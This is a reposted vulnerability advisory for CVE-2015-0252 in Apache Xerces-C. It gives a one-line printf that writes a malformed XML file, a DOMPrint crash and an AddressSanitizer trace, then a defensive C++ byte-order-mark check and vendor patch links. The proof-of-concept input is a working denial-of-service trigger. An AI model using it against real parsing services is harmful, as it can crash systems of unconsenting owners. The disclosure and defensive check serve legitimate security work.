Apache Xerces-c xml Parser < 3.1.2 DoS Vulnerability

Source: Internet
Author: User
Tags: xml parser cve




Affected Systems:

Apache Group Xerces C++ < 3.1.2

Description:

CVE (CAN) ID: CVE-2015-0252

Xerces is an open-source XML parsing project maintained by the Apache Software Foundation. It is available in several language implementations, including Java, C++, Perl, and COM.

Apache Xerces-C versions earlier than 3.1.2 contain a vulnerability in internal/XMLReader.cpp. A remote attacker can supply crafted XML data to cause a denial of service (segmentation fault and crash).

Source: vendor

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users act at their own risk!

The vendor () provides the following test method:


# Exploit Title: Apache Xerces-c xml Parser (<3.1.2) DoS POC
# Date: 2015-05-03
# Exploit Author: beford
# Vendor homepage: http://xerces.apache.org/#xerces-c
# Version: Versions prior to 3.1.2
# Tested on: Ubuntu 15.04
# CVE: CVE-2015-0252

Apache Xerces-c xml Parser Crashes on Malformed Input

I believe this to be the same issue that was reported as CVE-2015-0252.
Posting this in case anyone is interested in reproducing it.

Original advisory:
https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt

$ printf "\xff\xfe\x00\x00\x3c" > file.xml

$ DOMPrint ./file.xml   # Ubuntu 15.04 libxerces-c3.1 package
Segmentation fault

$ ./DOMPrint ./file.xml   # using an ASan-enabled build
=================================================================
==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c
at pc 0x836a721 bp 0xbf80000a8 sp 0xbf8000098
READ of size 1 at 0xb5d9d87c thread T0
    #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() xercesc/internal/XMLReader.cpp:1719
    #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761
    #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() xercesc/internal/XMLReader.cpp:576
    #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short const*) xercesc/internal/XMLReader.cpp:1223
    #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short const*) xercesc/internal/ReaderMgr.hpp:385
    #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) xercesc/internal/XMLScanner.cpp:1608
    #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() xercesc/internal/XMLScanner.cpp:1244
    #7 0x8d69220 in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:206
    #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400
    #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408
    #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601
    #11 0x8050bf2 in main src/DOMPrint.cpp:398
    #12 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)
    #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5)

0xb5d9d87c is located 0 bytes to the right of 163964-byte region [0xb5d75800,0xb5d9d87c)
allocated by thread T0 here:
    #0 0xb72c3ae4 in operator new(unsigned int) (/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4)
    #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) xercesc/internal/MemoryManagerImpl.cpp:40
    #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68
    #3 0x8daaaa7 in xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner2.cpp:1284
    #4 0x8d6912a in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:198
    #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400
    #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408
    #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601
    #8 0x8050bf2 in main src/DOMPrint.cpp:398
    #9 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)

SUMMARY: AddressSanitizer: heap-buffer-overflow xercesc/internal/XMLReader.cpp:1719 xercesc_3_1::XMLReader::refreshRawBuffer()
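An added pre-parse input check, not code from the advisory or from the Xerces project: the PoC bytes FF FE 00 00 3C are a UTF-32LE byte-order mark followed by a single stray byte, i.e. a truncated 4-byte code unit, and the trace above shows the crash in XMLReader's raw-buffer refresh during transcoding. The functions below (names detectBom and hasWholeCodeUnits are assumed) reject documents whose payload after the BOM is not a whole number of code units, as defence in depth for callers that cannot upgrade to 3.1.2 immediately.

```cpp
// Added example, not code from the advisory or from Xerces-C.
// A pre-parse sanity check on raw document bytes: identify the byte-order
// mark and reject payloads that are not a whole number of code units.
// The PoC above (FF FE 00 00 3C) is a UTF-32LE BOM plus one stray byte,
// so it fails this check. Function names are assumed for illustration;
// upgrading to Xerces-C >= 3.1.2 remains the actual fix.
#include <cstddef>
#include <cstdint>
#include <initializer_list>
#include <string>
#include <vector>

struct BomInfo {
    std::string encoding;  // encoding implied by the BOM, or "none"
    std::size_t bomLen;    // bytes taken up by the BOM itself
    std::size_t unitSize;  // bytes per code unit in that encoding
};

// Match the longest BOM first: UTF-32LE (FF FE 00 00) starts with the
// UTF-16LE BOM (FF FE), so testing UTF-16 first would misclassify it.
BomInfo detectBom(const std::vector<std::uint8_t>& doc) {
    auto startsWith = [&doc](std::initializer_list<int> sig) {
        if (doc.size() < sig.size()) return false;
        std::size_t i = 0;
        for (int b : sig) {
            if (doc[i++] != b) return false;
        }
        return true;
    };
    if (startsWith({0xFF, 0xFE, 0x00, 0x00})) return {"UTF-32LE", 4, 4};
    if (startsWith({0x00, 0x00, 0xFE, 0xFF})) return {"UTF-32BE", 4, 4};
    if (startsWith({0xFF, 0xFE}))             return {"UTF-16LE", 2, 2};
    if (startsWith({0xFE, 0xFF}))             return {"UTF-16BE", 2, 2};
    if (startsWith({0xEF, 0xBB, 0xBF}))       return {"UTF-8", 3, 1};
    return {"none", 0, 1};  // no BOM: treat as byte-oriented input
}

// True when the bytes after the BOM divide evenly into code units.
// A truncated final unit (as in the PoC) makes this return false, so a
// caller can refuse the document before handing it to the parser.
bool hasWholeCodeUnits(const std::vector<std::uint8_t>& doc) {
    const BomInfo bom = detectBom(doc);
    return (doc.size() - bom.bomLen) % bom.unitSize == 0;
}
```

This only screens out the truncated-code-unit class of input; it is not a substitute for the vendor fix.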

Suggestion:

Vendor patch:

Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

http://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt

http://svn.apache.org/viewvc?view=revision&revision=1667870
